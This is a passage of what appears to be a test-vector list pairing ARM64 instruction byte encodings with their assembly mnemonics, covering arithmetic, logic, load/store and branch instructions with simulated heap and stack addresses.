("\x20\x20\x62\xca", "eon x0, x1, x2, lsr #8"),
("\x20\x40\x62\xca", "eon x0, x1, x2, lsr #16"),
("\x20\x80\x62\xca", "eon x0, x1, x2, lsr #32"),
("\x20\x84\x62\xca", "eon x0, x1, x2, lsr #33"),
("\x20\x88\x62\xca", "eon x0, x1, x2, lsr #34"),
("\x20\x20\xa2\xca", "eon x0, x1, x2, asr #8"),
("\x20\x40\xa2\xca", "eon x0, x1, x2, asr #16"),
("\x20\x80\xa2\xca", "eon x0, x1, x2, asr #32"),
("\x20\x84\xa2\xca", "eon x0, x1, x2, asr #33"),
("\x20\x88\xa2\xca", "eon x0, x1, x2, asr #34"),
("\x20\x88\xa2\xca", "eon x0, x1, x2, asr #34"),
("\x82\x46\x82\xd2", "movz x2, #0x1234"),
("\x01\xcf\x8a\xd2", "movz x1, #0x5678"),
("\x20\x00\x22\xaa", "orn x0, x1, x2"),
("\x40\x00\x21\xaa", "orn x0, x2, x1"),
("\x41\x00\x20\xaa", "orn x1, x2, x0"),
("\x01\x00\x22\xaa", "orn x1, x0, x2"),
("\x20\x04\x22\xaa", "orn x0, x1, x2, lsl #1"),
("\x20\x08\x22\xaa", "orn x0, x1, x2, lsl #2"),
("\x20\x0c\x22\xaa", "orn x0, x1, x2, lsl #3"),
("\x20\x04\xe2\xaa", "orn x0, x1, x2, ror #1"),
("\x20\x08\xe2\xaa", "orn x0, x1, x2, ror #2"),
("\x20\x0c\xe2\xaa", "orn x0, x1, x2, ror #3"),
("\x82\x46\x82\xd2", "movz x2, #0x1234"),
("\x01\xcf\x8a\xd2", "movz x1, #0x5678"),
("\x20\x00\x02\xaa", "orr x0, x1, x2"),
("\x40\x00\x01\xaa", "orr x0, x2, x1"),
("\x41\x00\x00\xaa", "orr x1, x2, x0"),
("\x01\x00\x02\xaa", "orr x1, x0, x2"),
("\x20\x04\x02\xaa", "orr x0, x1, x2, lsl #1"),
("\x20\x08\x02\xaa", "orr x0, x1, x2, lsl #2"),
("\x20\x0c\x02\xaa", "orr x0, x1, x2, lsl #3"),
("\x20\x04\xc2\xaa", "orr x0, x1, x2, ror #1"),
("\x20\x08\xc2\xaa", "orr x0, x1, x2, ror #2"),
("\x20\x0c\xc2\xaa", "orr x0, x1, x2, ror #3"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x25\x00\x40\xf9", "ldr x5, [x1]"),
("\x26\x04\x40\xf8", "ldr x6, [x1], #0"),
("\x27\x44\x40\xf8", "ldr x7, [x1], #4"),
("\x28\x68\x62\xf8", "ldr x8, [x1, x2]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x29\x24\x5e\xf8", "ldr x9, [x1], #-30"),
("\x2a\x8c\x40\xf8", "ldr x10, [x1, #8]!"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
("\xeb\x03\x40\xf9", "ldr x11, [sp]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x25\x00\x40\x39", "ldrb w5, [x1]"),
("\x26\x04\x40\x38", "ldrb w6, [x1], #0"),
("\x27\x44\x40\x38", "ldrb w7, [x1], #4"),
("\x28\x68\x62\x38", "ldrb w8, [x1, x2]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x29\x24\x5e\x38", "ldrb w9, [x1], #-30"),
("\x2a\x8c\x40\x38", "ldrb w10, [x1, #8]!"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
("\xeb\x03\x40\x39", "ldrb w11, [sp]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x25\x00\x40\x79", "ldrh w5, [x1]"),
("\x26\x04\x40\x78", "ldrh w6, [x1], #0"),
("\x27\x44\x40\x78", "ldrh w7, [x1], #4"),
("\x28\x68\x62\x78", "ldrh w8, [x1, x2]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x29\x24\x5e\x78", "ldrh w9, [x1], #-30"),
("\x2a\x8c\x40\x78", "ldrh w10, [x1, #8]!"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
("\xeb\x03\x40\x79", "ldrh w11, [sp]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x24\x14\x40\xa9", "ldp x4, x5, [x1]"),
("\x25\x18\xc0\xa8", "ldp x5, x6, [x1], #0"),
("\x26\x9c\xc0\xa8", "ldp x6, x7, [x1], #8"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x28\x24\xfe\xa8", "ldp x8, x9, [x1], #-32"),
("\x29\x28\xc1\xa9", "ldp x9, x10, [x1, #16]!"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
("\xea\x2f\x40\xa9", "ldp x10, x11, [sp]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x24\x14\x40\x29", "ldp w4, w5, [x1]"),
("\x25\x18\xc0\x28", "ldp w5, w6, [x1], #0"),
("\x26\x1c\xc1\x28", "ldp w6, w7, [x1], #8"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x28\x24\xfc\x28", "ldp w8, w9, [x1], #-32"),
("\x29\x28\xc2\x29", "ldp w9, w10, [x1, #16]!"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
("\xea\x2f\x40\x29", "ldp w10, w11, [sp]"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x21\x30\x00\x91", "add x1, x1, #12"), # STACK+12
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x10\x40\xf8", "ldur x0, [x1, #1]"),
("\x20\x20\x40\xf8", "ldur x0, [x1, #2]"),
("\x20\x30\x40\xf8", "ldur x0, [x1, #3]"),
("\x20\x40\x40\xf8", "ldur x0, [x1, #4]"),
("\x20\xf0\x5f\xf8", "ldur x0, [x1, #-1]"),
("\x20\xe0\x5f\xf8", "ldur x0, [x1, #-2]"),
("\x20\xd0\x5f\xf8", "ldur x0, [x1, #-3]"),
("\x20\xc0\x5f\xf8", "ldur x0, [x1, #-4]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x40\x38", "ldurb w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x10\x40\x38", "ldurb w0, [x1, #1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x20\x40\x38", "ldurb w0, [x1, #2]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x30\x40\x38", "ldurb w0, [x1, #3]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x40\x40\x38", "ldurb w0, [x1, #4]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\xf0\x5f\x38", "ldurb w0, [x1, #0xffffffffffffffff]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\xe0\x5f\x38", "ldurb w0, [x1, #0xfffffffffffffffe]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\xd0\x5f\x38", "ldurb w0, [x1, #0xfffffffffffffffd]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\xc0\x5f\x38", "ldurb w0, [x1, #0xfffffffffffffffc]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x40\x78", "ldurh w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x10\x40\x78", "ldurh w0, [x1, #1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x20\x40\x78", "ldurh w0, [x1, #2]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x30\x40\x78", "ldurh w0, [x1, #3]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x40\x40\x78", "ldurh w0, [x1, #4]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\xf0\x5f\x78", "ldurh w0, [x1, #0xffffffffffffffff]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\xe0\x5f\x78", "ldurh w0, [x1, #0xfffffffffffffffe]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\xd0\x5f\x78", "ldurh w0, [x1, #0xfffffffffffffffd]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\xc0\x5f\x78", "ldurh w0, [x1, #0xfffffffffffffffc]"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x21\x30\x00\x91", "add x1, x1, #12"), # STACK+12
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\xc0\x38", "ldursb w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x80\x38", "ldursb x0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\xc0\x38", "ldursb w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\xc0\x78", "ldursh w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x80\x78", "ldursh x0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x80\xb8", "ldursw x0, [x1]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\xc0\x38", "ldursb w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x80\x38", "ldursb x0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\xc0\x38", "ldursb w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\xc0\x78", "ldursh w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x80\x78", "ldursh x0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x80\xb8", "ldursw x0, [x1]"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x21\x30\x00\x91", "add x1, x1, #12"), # STACK+12
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\xc0\x39", "ldrsb w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x80\x39", "ldrsb x0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\xc0\x39", "ldrsb w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\xc0\x79", "ldrsh w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x80\x79", "ldrsh x0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x80\xb9", "ldrsw x0, [x1]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\xc0\x39", "ldrsb w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x80\x39", "ldrsb x0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\xc0\x39", "ldrsb w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\xc0\x79", "ldrsh w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x80\x79", "ldrsh x0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x80\xb9", "ldrsw x0, [x1]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x06\xa0\xd2", "movz x2, #0x30, lsl #16"), # HEAP address
("\x42\x78\x00\x91", "add x2, x2, #30"),
("\x23\x00\x40\xf8", "ldur x3, [x1]"),
("\x44\x00\x40\xf8", "ldur x4, [x2]"),
("\x60\x00\xc4\x93", "extr x0, x3, x4, #0"),
("\x60\x04\xc4\x93", "extr x0, x3, x4, #1"),
("\x60\x08\xc4\x93", "extr x0, x3, x4, #2"),
("\x60\x0c\xc4\x93", "extr x0, x3, x4, #2"),
("\x60\x78\xc4\x93", "extr x0, x3, x4, #30"),
("\x60\xfc\xc4\x93", "extr x0, x3, x4, #63"),
("\x60\x00\x84\x13", "extr w0, w3, w4, #0"),
("\x60\x04\x84\x13", "extr w0, w3, w4, #1"),
("\x60\x08\x84\x13", "extr w0, w3, w4, #2"),
("\x60\x0c\x84\x13", "extr w0, w3, w4, #3"),
("\x60\x7c\x84\x13", "extr w0, w3, w4, #31"),
("\x01\x00\x00\x14", "b #4"),
("\x20\x00\x00\x54" ,"b.eq #4"),
("\x01\x00\x00\x94" ,"bl #4"),
("\x80\x0c\x90\xb7", "tbnz x0, #0x32, #0x190"),
("\x20\x00\x90\xb6", "tbz x0, #0x32, #4"),
("\x01\x00\x80\xd2", "movz x1, #0"),
("\x02\x06\xa0\xd2", "movz x2, #0x20, lsl #16"), # STACK address
("\xe1\x03\x02\xaa", "mov x1, x2"),
("\x3f\x00\x00\x91", "mov sp, x1"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xe0\x03\x21\xaa", "mvn x0, x1"),
("\xe0\x03\x01\xcb", "neg x0, x1"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x63\xa0\x84\xd2", "movz x3, #9475"),
("\x20\x0c\x02\x9b", "madd x0, x1, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x20\x7c\x02\x9b", "mul x0, x1, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x63\xa0\x84\xd2", "movz x3, #9475"),
("\x20\x8c\x02\x9b", "msub x0, x1, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x20\xfc\x02\x9b", "mneg x0, x1, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x63\xa0\x84\xd2", "movz x3, #9475"),
("\x64\xa0\x84\xd2", "movz x4, #9475"),
("\xe5\x24\x81\xd2", "movz x5, #2343"),
("\xa6\xaf\x81\xd2", "movz x6, #3453"),
("\x87\x3a\x82\xd2", "movz x7, #4564"),
("\xe8\x16\x84\xd2", "movz x8, #8375"),
("\xe9\xc1\x84\xd2", "movz x9, #9743"),
("\xea\xaa\x82\xd2", "movz x10, #5463"),
("\x2b\xf8\x80\xd2", "movz x11, #1985"),
("\x25\x00\x00\xf9", "str x5, [x1]"),
("\x26\x04\x00\xf8", "str x6, [x1], #0"),
("\x27\x44\x00\xf8", "str x7, [x1], #4"),
("\x28\x68\x22\xf8", "str x8, [x1, x2]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x29\x24\x1e\xf8", "str x9, [x1], #-30"),
("\x2a\x8c\x00\xf8", "str x10, [x1, #8]!"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
("\xeb\x03\x00\xf9", "str x11, [sp]"),
("\x25\x00\x00\xf8", "stur x5, [x1]"),
("\x26\x00\x00\x38", "sturb w6, [x1]"),
("\x27\x00\x00\x78", "sturh w7, [x1]"),
("\x29\x00\x00\xf9", "str x9, [x1]"),
("\x2a\x00\x00\x39", "strb w10, [x1]"),
("\x2b\x00\x00\x79", "strh w11, [x1]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\xe5\x24\x81\xd2", "movz x5, #2343"),
("\xa6\xaf\x81\xd2", "movz x6, #3453"),
("\x87\x3a\x82\xd2", "movz x7, #4564"),
("\xe8\x16\x84\xd2", "movz x8, #8375"),
("\xe9\xc1\x84\xd2", "movz x9, #9743"),
("\xea\xaa\x82\xd2", "movz x10, #5463"),
("\x25\x18\x00\xa9", "stp x5, x6, [x1]"),
("\x27\x20\x80\xa8", "stp x7, x8, [x1], #0"),
("\x29\xa8\x80\xa8", "stp x9, x10, [x1], #8"),
("\x25\x20\x82\xa9", "stp x5, x8, [x1, #32]!"),
("\x26\x1c\x01\xa9", "stp x6, x7, [x1, #16]"),
("\x25\x18\x00\x29", "stp w5, w6, [x1]"),
("\x27\x20\x80\x28", "stp w7, w8, [x1], #0"),
("\x29\x28\x81\x28", "stp w9, w10, [x1], #8"),
("\x25\x20\x84\x29", "stp w5, w8, [x1, #32]!"),
("\x26\x1c\x02\x29", "stp w6, w7, [x1, #16]"),
("\xc1\xbd\x9b\xd2", "movz x1, #0xddee"),
("\x20\x1c\x40\x93", "sxtb x0, x1"),
("\x20\x3c\x40\x93", "sxth x0, x1"),
("\x20\x7c\x40\x93", "sxtw x0, x1"),
("\x20\x1c\x00\x53", "uxtb w0, w1"),
("\x20\x3c\x00\x53", "uxth w0, w1"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x20\x00\x82\x9a", "csel x0, x1, x2, eq"),
("\x40\x00\x81\x9a", "csel x0, x2, x1, eq"),
("\x20\x10\x82\x9a", "csel x0, x1, x2, ne"),
("\x40\x10\x81\x9a", "csel x0, x2, x1, ne"),
("\x20\x04\x82\x9a", "csinc x0, x1, x2, eq"),
("\x40\x04\x81\x9a", "csinc x0, x2, x1, eq"),
("\x20\x14\x82\x9a", "csinc x0, x1, x2, ne"),
("\x40\x14\x81\x9a", "csinc x0, x2, x1, ne"),
("\x20\x04\x82\xda", "csneg x0, x1, x2, eq"),
("\x40\x04\x81\xda", "csneg x0, x2, x1, eq"),
("\x20\x14\x82\xda", "csneg x0, x1, x2, ne"),
("\x40\x14\x81\xda", "csneg x0, x2, x1, ne"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\x20\xf8\x7f\xd3", "lsl x0, x1, #1"),
("\x20\xf4\x7e\xd3", "lsl x0, x1, #2"),
("\x20\xf0\x7d\xd3", "lsl x0, x1, #3"),
("\x20\xec\x7c\xd3", "lsl x0, x1, #4"),
("\x20\xfc\x41\xd3", "lsr x0, x1, #1"),
("\x20\xfc\x42\xd3", "lsr x0, x1, #2"),
("\x20\xfc\x43\xd3", "lsr x0, x1, #3"),
("\x20\xfc\x44\xd3", "lsr x0, x1, #4"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x20\x20\xc2\x9a", "lsl x0, x1, x2"),
("\x20\x24\xc2\x9a", "lsr x0, x1, x2"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x3f\x00\x02\xeb", "cmp x1, x2"),
("\x5f\x00\x01\xeb", "cmp x2, x1"),
("\x01\x00\x80\xd2", "movz x1, #0"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x3f\x00\x02\xeb", "cmp x1, x2"),
("\x5f\x00\x01\xeb", "cmp x2, x1"),
("\x01\x00\x80\xd2", "movz x1, #0"),
("\x02\x00\x80\xd2", "movz x2, #0"),
("\x3f\x00\x02\xeb", "cmp x1, x2"),
("\x5f\x00\x01\xeb", "cmp x2, x1"),
("\xc1\x88\x83\xd2", "movz x1, #7238"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x3f\x00\x02\xeb", "cmp x1, x2"),
("\x5f\x00\x01\xeb", "cmp x2, x1"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x3f\x00\x02\xab", "cmn x1, x2"),
("\x5f\x00\x01\xab", "cmn x2, x1"),
("\x01\x00\x80\xd2", "movz x1, #0"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x3f\x00\x02\xab", "cmn x1, x2"),
("\x5f\x00\x01\xab", "cmn x2, x1"),
("\x01\x00\x80\xd2", "movz x1, #0"),
("\x02\x00\x80\xd2", "movz x2, #0"),
("\x3f\x00\x02\xab", "cmn x1, x2"),
("\x5f\x00\x01\xab", "cmn x2, x1"),
("\xc1\x88\x83\xd2", "movz x1, #7238"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x3f\x00\x02\xab", "cmn x1, x2"),
("\x5f\x00\x01\xab", "cmn x2, x1"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x63\xa0\x84\xd2", "movz x3, #9475"),
("\x20\x0c\xa2\x9b", "umaddl x0, w1, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
